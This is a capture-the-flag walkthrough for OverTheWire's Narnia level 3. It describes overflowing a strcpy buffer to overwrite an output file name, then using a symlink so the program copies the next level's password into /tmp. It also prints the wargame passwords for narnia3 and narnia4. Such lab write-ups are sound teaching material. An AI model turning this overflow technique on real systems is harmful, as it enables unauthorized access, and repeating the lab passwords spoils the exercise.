Level 3 Username : narnia3 Password : nairiepecu SSH : narnia.labs.overthewire.org:2226
To solve this level, we first ssh into the narnia server using the credentials provided above. Let’s have a look at the executable for this level and its source code.
As we can see above, the executable reads a file that user provides and copies its content to ‘/tmp/null‘. ‘/tmp/null‘ is a special file that discards all data written to it but reports that the write operation succeeded. For more information on it, read this wikipedia page.
On a first pass at the C code, we can see that it utilizes the vulnerable strcpy function with no check on size limits. The allocation for an input file name is 32 bytes and the output file is 16 bytes. Let’s look at the code in a debugger.
We can see above that the executable copies the string name stored at 0x58(%esp) first and then the string name stored at 0x38(%esp). Both these locations probably store the file names to be opened. Therefore, we can conclude that if we overflow the buffer for input file name, we can modify the name for output file as well and possibly change it to something other than the null device.
Let’s confirm this theory by providing a filename more than 32 characters and breaking the flow in gdb before the files are opened.
As we can see, there are two breakpoints set and a long filename passed to the executable. At the first breakpoint which is right before the output file is opened, the value is set to “7890” and we can see in the next few statements that the file tried to be opened is “7890” which is 32 characters after our input file name. Therefore, we are successfully able to change the output file name. Let’s create a file “7890” and see how the input file looks like at the second breakpoint.
As we can see, the input filename is the one we provided to the executable. Therefore, now we control the input file and the output file. Let’s provide the executable an input file which contains or references the password and an output file which we control.
To solve this, I created a folder within /tmp called Narnia0003 and a folder within it called SecurityTimes003. The total length of the following string is 32 bytes.
Therefore, anything that follows the above path will overwrite the output file. To solve that, I created an output file within /tmp named output. I also created an input file named output within a folder named tmp which nests under /tmp/Narnia0003/SecurityTimes003. If we symbolically link this file to the password file, we can use it as the input file and the output file will be re-written to /tmp/output which is a file we can view.
As we can see above, the executable updates the output file to our file and prints the password for the next level in it.
Level 4 Username : narnia4 Password : thaenohtai SSH : narnia.labs.overthewire.org:2226